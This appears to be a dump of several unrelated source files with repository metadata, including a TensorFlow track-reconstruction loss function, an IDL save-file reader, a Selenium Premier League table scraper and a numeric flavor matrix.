'pos_x', 'pos_y', 'pos_z', 'time' as defined in the label_particle_keys.
Parameters
----------
config : dict
Dictionary containing all settings as read in from config file.
data_handler : :obj: of class DataHandler
An instance of the DataHandler class. The object is used to obtain
meta data.
data_transformer : :obj: of class DataTransformer
An instance of the DataTransformer class. The object is used to
transform data.
shared_objects : dict
A dictionary containg settings and objects that are shared and passed
on to sub modules.
*args
Variable length argument list.
**kwargs
Arbitrary keyword arguments.
Returns
-------
tf.Tensor
A tensorflow tensor containing the loss for each label.
Shape: label_shape (same shape as labels)
"""
index_dir_x = data_handler.get_label_index(config['label_dir_x_key'])
index_dir_y = data_handler.get_label_index(config['label_dir_y_key'])
index_dir_z = data_handler.get_label_index(config['label_dir_z_key'])
index_pos_x = data_handler.get_label_index(
config['label_particle_keys']['pos_x'])
index_pos_y = data_handler.get_label_index(
config['label_particle_keys']['pos_y'])
index_pos_z = data_handler.get_label_index(
config['label_particle_keys']['pos_z'])
index_time = data_handler.get_label_index(
config['label_particle_keys']['time'])
dir_x_true = shared_objects['y_true'][:, index_dir_x]
dir_y_true = shared_objects['y_true'][:, index_dir_y]
dir_z_true = shared_objects['y_true'][:, index_dir_z]
x_true = shared_objects['y_true'][:, index_pos_x]
y_true = shared_objects['y_true'][:, index_pos_y]
z_true = shared_objects['y_true'][:, index_pos_z]
time_true = shared_objects['y_true'][:, index_time]
x_pred = shared_objects['y_pred'][:, index_pos_x]
y_pred = shared_objects['y_pred'][:, index_pos_y]
z_pred = shared_objects['y_pred'][:, index_pos_z]
time_pred = shared_objects['y_pred'][:, index_time]
x_unc = shared_objects['y_unc'][:, index_pos_x]
y_unc = shared_objects['y_unc'][:, index_pos_y]
z_unc = shared_objects['y_unc'][:, index_pos_z]
time_unc = shared_objects['y_unc'][:, index_time]
# x: predicted point, p: true point on track, d: true unit direction vector
# calculate a = x - p
a1 = x_pred - x_true
a2 = y_pred - y_true
a3 = z_pred - z_true
# scalar product s = a*d, s is distance to closest point on infinite track
s = a1*dir_x_true + a2*dir_y_true + a3*dir_z_true
# caculate r = s*d -a = (p + s*d) - x
r1 = s*dir_x_true - a1
r2 = s*dir_y_true - a2
r3 = s*dir_z_true - a3
# calculate time diff [meter] at closest approach point on infinite track
c = 0.299792458 # in m /ns
rt = (time_true + (s / c) - time_pred) * c
gl_x = 2*tf.math.log(x_unc) + (r1 / x_unc)**2
gl_y = 2*tf.math.log(y_unc) + (r2 / y_unc)**2
gl_z = 2*tf.math.log(z_unc) + (r3 / z_unc)**2
gl_t = 2*tf.math.log(time_unc) + (rt / time_unc)**2
if 'event_weights' in shared_objects:
weights = shared_objects['event_weights']
w_sum = tf.reduce_sum(input_tensor=weights, axis=0)
loss_x = tf.reduce_sum(input_tensor=gl_x * weights, axis=0) / w_sum
loss_y = tf.reduce_sum(input_tensor=gl_y * weights, axis=0) / w_sum
loss_z = tf.reduce_sum(input_tensor=gl_z * weights, axis=0) / w_sum
loss_t = tf.reduce_sum(input_tensor=gl_t * weights, axis=0) / w_sum
else:
loss_x = tf.reduce_mean(input_tensor=gl_x, axis=0)
loss_y = tf.reduce_mean(input_tensor=gl_y, axis=0)
loss_z = tf.reduce_mean(input_tensor=gl_z, axis=0)
loss_t = tf.reduce_mean(input_tensor=gl_t, axis=0)
zeros = tf.zeros_like(loss_x)
loss_all_list = []
for label in data_handler.label_names:
if label == config['label_particle_keys']['pos_x']:
loss_all_list.append(loss_x)
elif label == config['label_particle_keys']['pos_y']:
loss_all_list.append(loss_y)
elif label == config['label_particle_keys']['pos_z']:
loss_all_list.append(loss_z)
elif label == config['label_particle_keys']['time']:
loss_all_list.append(loss_t)
else:
loss_all_list.append(zeros)
loss_all = tf.stack(loss_all_list, axis=0)
loss_utils.add_logging_info(data_handler, shared_objects)
return loss_all
| 37.827119
| 94
| 0.667623
| 1,748
| 11,159
| 3.953089
| 0.101831
| 0.077135
| 0.060781
| 0.053256
| 0.919247
| 0.919247
| 0.916932
| 0.912301
| 0.898408
| 0.869754
| 0
| 0.011811
| 0.226096
| 11,159
| 294
| 95
| 37.955782
| 0.788328
| 0.241061
| 0
| 0.783217
| 0
| 0
| 0.095883
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013986
| false
| 0
| 0.034965
| 0
| 0.062937
| 0.006993
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
17f7f752854eeb49405829e640f48cf138a6d0c9
| 53
|
py
|
Python
|
test3a.py
|
jonloga/pynetc
|
e4a2d533de920d6e6c5bb6b5e09699992ba796d2
|
[
"Apache-2.0"
] | null | null | null |
test3a.py
|
jonloga/pynetc
|
e4a2d533de920d6e6c5bb6b5e09699992ba796d2
|
[
"Apache-2.0"
] | null | null | null |
test3a.py
|
jonloga/pynetc
|
e4a2d533de920d6e6c5bb6b5e09699992ba796d2
|
[
"Apache-2.0"
] | null | null | null |
for x in range(10):
print(x)
print(x)
print(x)
| 7.571429
| 19
| 0.584906
| 11
| 53
| 2.818182
| 0.545455
| 0.580645
| 0.709677
| 0.774194
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.05
| 0.245283
| 53
| 6
| 20
| 8.833333
| 0.725
| 0
| 0
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.75
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
aa385f23aebfb544eecb71572cfdec93f13081a3
| 130
|
py
|
Python
|
circuitgraph/parsing/__init__.py
|
ncasti/circuitgraph
|
9fe129d6ba64b4254d2d27d16ae69b7dce5ce957
|
[
"MIT"
] | 35
|
2020-07-17T21:02:31.000Z
|
2022-03-22T20:48:30.000Z
|
circuitgraph/parsing/__init__.py
|
ncasti/circuitgraph
|
9fe129d6ba64b4254d2d27d16ae69b7dce5ce957
|
[
"MIT"
] | 23
|
2020-07-30T17:58:33.000Z
|
2021-09-24T16:41:34.000Z
|
circuitgraph/parsing/__init__.py
|
ncasti/circuitgraph
|
9fe129d6ba64b4254d2d27d16ae69b7dce5ce957
|
[
"MIT"
] | 6
|
2020-07-31T18:27:14.000Z
|
2021-11-11T19:32:47.000Z
|
"""
Utilities for parsing netlists
"""
from circuitgraph.parsing.verilog import *
from circuitgraph.parsing.fast_verilog import *
| 21.666667
| 47
| 0.8
| 15
| 130
| 6.866667
| 0.6
| 0.31068
| 0.446602
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.107692
| 130
| 5
| 48
| 26
| 0.887931
| 0.230769
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a4c6ed8f8fb8d176ba8299b9bf972f72cebc5628
| 6,754
|
py
|
Python
|
pyuvis/idlsav.py
|
spacemanjosh/pyuvis
|
55c4942c61c8a152bbb7d199be719a7ad2dd0b8a
|
[
"BSD-2-Clause"
] | 1
|
2020-04-16T17:25:28.000Z
|
2020-04-16T17:25:28.000Z
|
pyuvis/idlsav.py
|
spacemanjosh/pyuvis
|
55c4942c61c8a152bbb7d199be719a7ad2dd0b8a
|
[
"BSD-2-Clause"
] | 5
|
2020-11-06T19:12:17.000Z
|
2021-11-12T17:20:51.000Z
|
pyuvis/idlsav.py
|
michaelaye/pyuvis
|
904b64a5cc306f3b724ca445b8d1fd2cc5d1ec0c
|
[
"BSD-2-Clause"
] | 2
|
2019-02-24T15:47:10.000Z
|
2020-06-09T06:00:09.000Z
|
# AUTOGENERATED! DO NOT EDIT! File to edit: notebooks/02_idlsav.ipynb (unless otherwise specified).
__all__ = ['check_kernels', 'swap_cell', 'read_idlsav_file', 'SavConverter']
# Cell
from scipy.io import readsav
import pandas as pd
import numpy as np
# Cell
def check_kernels(cell):
if all(np.unique(cell) == np.array([''])):
return np.NAN
else:
return cell
# Cell
def swap_cell(cell):
return cell.byteswap().newbyteorder()
# Cell
def read_idlsav_file(filename):
tmp = readsav(filename)
# find largest substructure and return that
key_of_longest = ''
longestlength = 0
print("Searching for longest substructure and returning that.")
for thiskey in tmp.keys():
try:
thislength = len(tmp[thiskey])
except TypeError:
print("Item with key '{}' has no length. Skipping."
.format(thiskey))
continue
print("Found '{}'' with length {}.".format(thiskey, thislength))
if thislength > longestlength:
key_of_longest = thiskey
longestlength = thislength
print("Return substructure with name '{}'.".format(key_of_longest))
df = pd.DataFrame.from_records(tmp[key_of_longest])
#print df.dtypes.values
# There is a problem here. You see all these '>f8' datatypes in there?
# This means that at least those parts of the IDL data structure is in the
# inverse byte-ordering way than today's modern PC use, horrible!!
# One needs to convert this, otherwise all the numbers can't be trusted.
# print df.head()
#print df.UVIS[0]
# This looks like each cell has a 2D numpy array:
# print df.UVIS[0].shape
# print df.columns.values
# Ok, let's change the columns that can be changed easily, i.e. the columns
# that don't have arrays in each cell:
df = df.apply(lambda x: x.values.byteswap().newbyteorder()
if x.dtype != 'O' else x)
## print df.dtypes.values
# As you can see, the float dtypes are now pointing to the left ('<f8')
# which means they are little-endian, as any normal computer is these days.
# Now, let's put a proper index, `time` for instance:
#df.index = pd.DatetimeIndex(df.UTC)
## print df.drop('UTC', axis=1, inplace=True)
## print df.index
# Now, swap the bytes for each array in each DataFrame cell
# first loop over columns, and then eeach column get's the lambda converter
# func from above.
for col in df.columns:
if df[col].dtype != np.dtype('O'):
try:
df[col] = df[col].map(swap_cell)
except TypeError:
print(col, 'typeerror')
#print df.UVIS.iloc[0].dtype
#print df.dtypes.values
# TODO: put this stuff later in o clean-up function
# success!!
# Now let's see if the KERNELS column actually ever has data:
# df.KERNELS = df.KERNELS.map(check_kernels)
## print 'wtf', df.KERNELS.notnull().value_counts()
# This means that no KERNEL data was included, so we can drop it:
# print df.drop('KERNELS', axis=1, inplace=True)
# first only look at easy columns where there isn't an array per cell:
# dtypecheck = df.dtypes != 'O'
# easy_cols = dtypecheck[dtypecheck is True].index
# note you can scroll the table to the right, but if it's wider or longer
# than a certain number (settable) than it's truncated
#print df[easy_cols]
# Now it's your turn! ;)
return df
# Cell
class SavConverter:
def __init__(self, filename):
self.fname = filename
tmp = readsav(filename)
# find largest substructure and return that
key_of_longest = ''
longestlength = 0
print("Searching for longest substructure and returning that.")
for thiskey in tmp.keys():
try:
thislength = len(tmp[thiskey])
except TypeError:
print("Item with key '{}' has no length. Skipping."
.format(thiskey))
continue
print("Found '{}'' with length {}.".format(thiskey, thislength))
if thislength > longestlength:
key_of_longest = thiskey
longestlength = thislength
print("Return substructure with name '{}'.".format(key_of_longest))
self.df = pd.DataFrame.from_records(tmp[key_of_longest])
@property
def dtypes(self):
return self.df.dtypes.values
#print df.dtypes.values
# There is a problem here. You see all these '>f8' datatypes in there?
# This means that at least those parts of the IDL data structure is in the
# inverse byte-ordering way than today's modern PC use, horrible!!
# One needs to convert this, otherwise all the numbers can't be trusted.
# print df.head()
#print df.UVIS[0]
# This looks like each cell has a 2D numpy array:
# print df.UVIS[0].shape
# print df.columns.values
# Ok, let's change the columns that can be changed easily, i.e. the columns
# that don't have arrays in each cell:
# df = df.apply(lambda x: x.values.byteswap().newbyteorder()
# if x.dtype != 'O' else x)
## print df.dtypes.values
# As you can see, the float dtypes are now pointing to the left ('<f8')
# which means they are little-endian, as any normal computer is these days.
# Now, let's put a proper index, `time` for instance:
#df.index = pd.DatetimeIndex(df.UTC)
## print df.drop('UTC', axis=1, inplace=True)
## print df.index
# Now, swap the bytes for each array in each DataFrame cell
# first loop over columns, and then eeach column get's the lambda converter
# func from above.
# for col in df.columns:
# if df[col].dtype != np.dtype('O'):
# try:
# df[col] = df[col].map(swap_cell)
# except TypeError:
# print(col, 'typeerror')
#print df.UVIS.iloc[0].dtype
#print df.dtypes.values
# TODO: put this stuff later in o clean-up function
# success!!
# Now let's see if the KERNELS column actually ever has data:
# df.KERNELS = df.KERNELS.map(check_kernels)
## print 'wtf', df.KERNELS.notnull().value_counts()
# This means that no KERNEL data was included, so we can drop it:
# print df.drop('KERNELS', axis=1, inplace=True)
# first only look at easy columns where there isn't an array per cell:
# dtypecheck = df.dtypes != 'O'
# easy_cols = dtypecheck[dtypecheck is True].index
# note you can scroll the table to the right, but if it's wider or longer
# than a certain number (settable) than it's truncated
#print df[easy_cols]
# Now it's your turn! ;)
# return df
| 35.925532
| 99
| 0.633254
| 966
| 6,754
| 4.380952
| 0.233954
| 0.039698
| 0.022684
| 0.026938
| 0.899338
| 0.899338
| 0.899338
| 0.899338
| 0.899338
| 0.880907
| 0
| 0.004034
| 0.265916
| 6,754
| 188
| 100
| 35.925532
| 0.849536
| 0.578176
| 0
| 0.557377
| 1
| 0
| 0.137918
| 0
| 0
| 0
| 0
| 0.005319
| 0
| 1
| 0.081967
| false
| 0
| 0.04918
| 0.032787
| 0.229508
| 0.147541
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a4f9946d6bff4472ecf9998fa01b7f5721c6d3b7
| 311
|
py
|
Python
|
Codewars/6kyu/decompose-a-number/Python/test.py
|
RevansChen/online-judge
|
ad1b07fee7bd3c49418becccda904e17505f3018
|
[
"MIT"
] | 7
|
2017-09-20T16:40:39.000Z
|
2021-08-31T18:15:08.000Z
|
Codewars/6kyu/decompose-a-number/Python/test.py
|
RevansChen/online-judge
|
ad1b07fee7bd3c49418becccda904e17505f3018
|
[
"MIT"
] | null | null | null |
Codewars/6kyu/decompose-a-number/Python/test.py
|
RevansChen/online-judge
|
ad1b07fee7bd3c49418becccda904e17505f3018
|
[
"MIT"
] | null | null | null |
# Python - 3.6.0
test.assert_equals(decompose(0), [[], 0])
test.assert_equals(decompose(4), [[2], 0])
test.assert_equals(decompose(9), [[3], 1])
test.assert_equals(decompose(25), [[4, 2], 0])
test.assert_equals(decompose(8330475), [[22, 13, 10, 8, 7, 6, 6, 5, 5, 5, 4, 4, 4, 3, 3, 3, 3, 3, 3, 2, 2, 2, 2], 0])
| 38.875
| 117
| 0.598071
| 61
| 311
| 2.967213
| 0.327869
| 0.276243
| 0.441989
| 0.690608
| 0.629834
| 0.309392
| 0.309392
| 0
| 0
| 0
| 0
| 0.186567
| 0.138264
| 311
| 7
| 118
| 44.428571
| 0.488806
| 0.045016
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3543a5b6c8b285d716d55aab946bbca092604c26
| 3,128
|
py
|
Python
|
Premier_league_web_scraping.py
|
dlam96/Premier-league-web-scraper
|
b1fb3d03d8d24eacfe02afc24598aae2dd8594ee
|
[
"Unlicense"
] | null | null | null |
Premier_league_web_scraping.py
|
dlam96/Premier-league-web-scraper
|
b1fb3d03d8d24eacfe02afc24598aae2dd8594ee
|
[
"Unlicense"
] | null | null | null |
Premier_league_web_scraping.py
|
dlam96/Premier-league-web-scraper
|
b1fb3d03d8d24eacfe02afc24598aae2dd8594ee
|
[
"Unlicense"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
# In[1]:
from selenium import webdriver
from bs4 import BeautifulSoup
import pandas as pd
import numpy as np
import os
# In[2]:
# load url
url ="http://www.espn.co.uk/football/table/_/league/eng.1"
# create a new Firefox session
driver = webdriver.Firefox()
driver.implicitly_wait(30)
driver.get(url)
# In[3]:
# load data values and append to data list
datalist = []
for i in range(1, 21):
# pos = driver.find_element_by_xpath('/html/body/div[1]/div/div/div/div/div[5]/div[3]/div[1]/div/section/section/section/div[1]/section/table/tbody/tr/td[1]/table[1]/tbody/tr['+ str(i) +']/td/div/span[1]').text
teams = driver.find_element_by_xpath('/html/body/div[1]/div/div/div/div/div[5]/div[3]/div[1]/div/section/section/section/div[1]/section/table/tbody/tr/td[1]/table[1]/tbody/tr['+ str(i) +']/td/div/span[4]/a').text
gp = driver.find_element_by_xpath('/html/body/div[1]/div/div/div/div/div[5]/div[3]/div[1]/div/section/section/section/div[1]/section/table/tbody/tr/td[2]/div/div/div[2]/table/tbody/tr/td/table/tbody/tr['+ str(i) +']/td[1]/span').text
w = driver.find_element_by_xpath('/html/body/div[1]/div/div/div/div/div[5]/div[3]/div[1]/div/section/section/section/div[1]/section/table/tbody/tr/td[2]/div/div/div[2]/table/tbody/tr/td/table/tbody/tr['+ str(i) +']/td[2]/span').text
d = driver.find_element_by_xpath('/html/body/div[1]/div/div/div/div/div[5]/div[3]/div[1]/div/section/section/section/div[1]/section/table/tbody/tr/td[2]/div/div/div[2]/table/tbody/tr/td/table/tbody/tr['+ str(i) +']/td[3]/span').text
l = driver.find_element_by_xpath('/html/body/div[1]/div/div/div/div/div[5]/div[3]/div[1]/div/section/section/section/div[1]/section/table/tbody/tr/td[2]/div/div/div[2]/table/tbody/tr/td/table/tbody/tr['+ str(i) +']/td[4]/span').text
f = driver.find_element_by_xpath('/html/body/div[1]/div/div/div/div/div[5]/div[3]/div[1]/div/section/section/section/div[1]/section/table/tbody/tr/td[2]/div/div/div[2]/table/tbody/tr/td/table/tbody/tr['+ str(i) +']/td[5]/span').text
a = driver.find_element_by_xpath('/html/body/div[1]/div/div/div/div/div[5]/div[3]/div[1]/div/section/section/section/div[1]/section/table/tbody/tr/td[2]/div/div/div[2]/table/tbody/tr/td/table/tbody/tr['+ str(i) +']/td[6]/span').text
gd = driver.find_element_by_xpath('/html/body/div[1]/div/div/div/div/div[5]/div[3]/div[1]/div/section/section/section/div[1]/section/table/tbody/tr/td[2]/div/div/div[2]/table/tbody/tr/td/table/tbody/tr['+ str(i) +']/td[7]/span').text
p = driver.find_element_by_xpath('/html/body/div[1]/div/div/div/div/div[5]/div[3]/div[1]/div/section/section/section/div[1]/section/table/tbody/tr/td[2]/div/div/div[2]/table/tbody/tr/td/table/tbody/tr['+ str(i) +']/td[8]/span').text
datalist.append([teams, gp, w, d ,l ,f, a, gd, p])
driver.quit()
# In[4]:
# label columns and start row at 1
df = pd.DataFrame(datalist, columns=['Team', 'Games Played', 'Wins', 'Draw', 'Losses', 'Goals Scored', 'Goals Conceeded', 'Goal Difference', 'Points'])
df.index = df.index + 1
df.index.name = 'Position'
# In[5]:
df
| 44.056338
| 237
| 0.683824
| 605
| 3,128
| 3.482645
| 0.173554
| 0.159468
| 0.162316
| 0.113906
| 0.706217
| 0.706217
| 0.706217
| 0.706217
| 0.706217
| 0.706217
| 0
| 0.032963
| 0.078645
| 3,128
| 70
| 238
| 44.685714
| 0.698126
| 0.125639
| 0
| 0
| 0
| 0.384615
| 0.633358
| 0.541146
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.192308
| 0
| 0.192308
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
10416e7e1581b93e327f5c728edd60f519c294cb
| 19,917
|
py
|
Python
|
flavor_matrix.py
|
martincyoung/Flavor-Cliques
|
8b932f9028451b14411616aa780162682a374558
|
[
"MIT"
] | 1
|
2021-11-28T23:11:36.000Z
|
2021-11-28T23:11:36.000Z
|
flavor_matrix.py
|
martincyoung/Flavor-Cliques
|
8b932f9028451b14411616aa780162682a374558
|
[
"MIT"
] | null | null | null |
flavor_matrix.py
|
martincyoung/Flavor-Cliques
|
8b932f9028451b14411616aa780162682a374558
|
[
"MIT"
] | null | null | null |
FLAVOR_MATRIX = [
[0,0,1,1,1,1,0,0,0,1,0,0,0,0,1,1,0,1,0,0,1,0,0,1,0,1,0,0,1,0,1,1,1,1,0,1,1,0,0,0,0,0,0,1,1,1,0,0,1,0,1,1,0,0,1,1,0,0,0,1,0,0,0,1,1,0,1,0,0,0,0,1,0,1,0,0,0,0,1,1,1,1,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,1,0],
[0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,1,0,0,1,0,0,1,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,1,0,1,0,0,0,0,0,1,0,0,0,1,1,1,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,1,0,1,0,0,1,0,0,0,1,0,0,0,0,1,0,0,1],
[1,0,0,1,0,1,0,0,1,1,1,1,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,1,1,1,0,1,0,0,0,1,0,0,1,1,0,0,0,1,1,0,1,0,0,0,1,1,0,0,0,1,1,1,0,1,1,0,1,1,0,1,1,0,0,1,1,1,0,0,0,1,0,0,1,0,1,0,0,1,1,0,1,0,1,1,1,0,0,0,1],
[1,0,1,0,0,0,0,0,1,0,0,0,1,0,1,0,1,1,0,0,1,1,0,0,1,0,0,1,0,0,0,0,0,1,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,1,1,0,0,0,1,0,0,0,1,0,0,0,0,0,1,1,1,1,0,0,0,0,1,0,0,1,1,0,1,0,0,0,0,0,1,1,1,0,0,0,0],
[1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,1,0,0,0,0,1,0,1,0,0,1,0,0,0,1,0,0,0,1,0,0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,1,0,0,1,0,1,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0],
[1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,1,0,1,0,0,1,0,0,0,1,0,1,0,0,0,1,1,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,1],
[0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,1,0,0,0,0,0],
[0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,1,1,0,1,0,1,0,0,0,0,0,0,1,1,0,1,0,0,0,0,1,0,1,0,1,0,1,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,1,1,0,0,1,0,0,0,0,0,0,0,0],
[0,0,1,1,0,0,0,1,0,1,0,1,0,1,0,0,1,0,1,1,1,1,0,1,0,0,0,0,0,0,1,1,1,0,1,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,1,0,1,0,0,0,0,1,0,0,0,1,0,0,0,1,1,1,1,1,1,0,0,0,1,1,1,0,0,0,0,0,0,1,1,0,0,0,0,1,1,1,0,0,1,0,0,0,1],
[1,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,1,0,1,0,1,1,0,1,1,0,0,0,0,0,1,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0],
[0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,1,0,0,0,0,0,0,1,0,1,0,0,1,0,0,1,0,0,0,0,1,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,1,0,0,0,1,0,0,1,0,0,0,0,0],
[0,1,1,0,0,0,0,0,1,0,0,0,1,1,1,0,0,0,1,1,0,1,1,0,1,0,0,1,0,0,0,1,0,1,1,1,1,0,0,0,0,1,1,0,1,1,0,0,0,0,1,0,1,1,0,1,1,1,0,0,1,1,0,1,1,1,1,1,1,1,1,0,1,1,0,1,1,0,0,0,0,0,0,0,1,0,0,0,1,1,1,1,0,1,0,1,0,0,0],
[0,1,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,1,1,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,1,0,1,1,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0],
[0,0,0,0,0,0,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,1,0,0,0,0,0,0,0,0],
[1,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0],
[1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,1,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0],
[0,0,0,0,0,0,0,1,1,0,0,1,0,0,0,0,0,1,0,1,1,1,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,1,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,1,0,1,0,0,0],
[0,1,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0],
[1,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,1,0,0,0,0,1,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,1,1,1,0,0,0,0,0,0,0,0,0,0,1,0,1,1,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,1,1,0,0,0,0,0,1,0,0,0,0,0,0,0],
